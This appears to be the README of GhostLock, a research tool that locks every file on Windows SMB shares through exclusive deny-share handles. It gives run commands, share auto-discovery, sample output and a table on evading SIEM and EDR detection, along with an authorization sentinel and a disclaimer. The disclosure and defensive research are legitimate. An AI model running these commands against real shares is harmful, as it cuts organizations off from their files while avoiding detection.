SMB Deny-Share Handle Availability Research Tool
Ransomware-grade availability impact. Zero writes. Zero encryption. Zero traces in your SIEM.
GhostLock demonstrates that a low-privileged Windows domain user with standard read access to an SMB share can produce ransomware-equivalent organizational availability impact with zero writes, zero encryption, and zero signals in every behavioral defense the modern enterprise security stack deploys.
By calling CreateFileW with dwShareMode = 0x00000000, the caller acquires an exclusive deny-share handle. Every other client attempting to open that file receives STATUS_SHARING_VIOLATION (0xC0000043). Applied across an entire share with 32 parallel threads, GhostLock locks hundreds of thousands of files in minutes.
No CVE. No patch. No vulnerability. This is correct, documented Windows API behavior that has existed since Windows NT 3.1.
| Detection Signal | Encryption Ransomware | GhostLock |
|---|---|---|
| Bulk write I/O | Detectable | None |
| File rename / new extension | Detectable | None |
| Honey file triggered | Write to canary | Read-open only |
| Behavioral AI (write rate) | Fires | No writes |
| EDR on endpoint | Shellcode / injection | Looks like file indexer |
| DLP / content inspection | Bulk read anomaly | Indistinguishable from backup |
| Network traffic anomaly | Bulk SMB writes | Identical to Word opening a doc |
| Storage session open-file count | Not relevant | Only reliable signal |
The only observable that identifies this attack lives inside the NAS session table — a metric virtually no enterprise SIEM currently ingests.
1. Run ghostlock.py — interactive menu appears
2. Choose: paste a UNC path, or auto-discover shares on the network
3. Tool discovers files recursively using 32-thread parallel os.scandir()
4. For each file: CreateFileW(dwShareMode=0) acquires exclusive handle
5. Holds all handles indefinitely — other clients get STATUS_SHARING_VIOLATION
6. Ctrl+C releases all handles cleanly and writes a JSON + Markdown report
- Windows 10 / Server 2016 or later
- Python 3.9+
- Domain user account with read access to the target share
- A sentinel file in the target directory (see Safety)
No third-party packages. Pure Python stdlib.
git clone https://github.com/kimd155/ghostlock.git
cd ghostlockNo pip install. No dependencies.
python ghostlock.py ___ _ _ ___ ___ ____ __ ___ ___ _ _
/ __)( )( )/ __)/ __)(_ _)( ) / __)( ,)( )/ )
( (_-. )__( \__ \__ \ )( )(__( (__ ) \ ) (
\___/(____)(____(____/ (__) (____)\___)(__)/ (_)\_)
usage: ghostlock.py [path] [options]
options:
--hold-indefinite hold locks until Ctrl+C
--hold-seconds N hold for N seconds
--locks N max files to lock
--existing-folder lock existing files
--confirm-existing-lock required with --existing-folder
--recursive recurse into subdirectories
--targets-file FILE JSON targets file
--victims N victim simulation workers
run without arguments for interactive menu
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Select mode:
[1] Manual path — paste a UNC path and lock it
[2] Auto-discover — find shared folders on the network, pick which to lock
[q] Quit
Option 1 — paste a UNC path, tool discovers files and locks them:
[?] Target UNC path : \\fileserver\share\dept
[+] Sentinel found. Discovering files ...
[*] Scanning ... 4,821 files found (12 dirs pending)
[+] 4,821 files discovered in 8.3s
[?] Lock all 4,821 files indefinitely? [y/N] : y
[+] 4,819 handles acquired (2 skipped)
[~] Holding ... 47s | 4,819 files locked
Option 2 — auto-discovers SMB shares on the network, pick multiple to lock:
[*] Scanning visible SMB shares on the network ...
[OK] \\server\finance 12 files visible
[OK] \\server\projects 84 files visible
[NO] \\server\admin (inaccessible)
Select : 1,2 (or 'all')
# Indefinite hold, all files, recursive
python ghostlock.py "\\server\share\path" `
--existing-folder `
--confirm-existing-lock `
--hold-indefinite
# Timed hold with victim simulation
python ghostlock.py "\\server\share\path" `
--existing-folder `
--confirm-existing-lock `
--locks 256 `
--hold-seconds 120 `
--victims 16| Argument | Default | Description |
|---|---|---|
share_path |
(interactive) | UNC or mapped path |
--locks |
64 | Max files to lock |
--hold-seconds |
60 | Duration (ignored with --hold-indefinite) |
--hold-indefinite |
off | Hold until Ctrl+C |
--victims |
16 | Blocking simulation workers |
--rounds |
20 | Operations per victim worker |
--existing-folder |
off | Lock files that already exist |
--confirm-existing-lock |
off | Required with --existing-folder |
--recursive |
off | Discover files recursively |
--targets-file |
— | JSON targets file for multi-target runs |
A sentinel file must exist in any target directory before GhostLock will acquire handles against existing files:
New-Item -ItemType File "\\server\share\targetfolder\.ghostlock_authorized"GhostLock refuses to run without it. In generated-files mode (without --existing-folder), the tool creates its own test files and never touches existing data.
GhostLock_PoC_report_YYYYMMDD_HHMMSS/
lock_impact_result.json
lock_impact_result.md
ghostlock_cache.json <- re-use for instant re-lock on reconnect
"GhostLock: SMB Deny-Share Handles as a Zero-Privilege Availability Weapon" Kim Dvash, May 2026
Read the full paper: zenodo.org/records/20070064
Research site: ghostlock.io
THIS TOOL IS FOR AUTHORIZED SECURITY TESTING AND RESEARCH ONLY.
Running GhostLock against any system or network without explicit
written authorization from the system owner is illegal and unethical.
MIT — see LICENSE
Kim Dvash · linkedin.com/in/kim-d-5b3114111 · ghostlock.io
dwShareMode = 0x00000000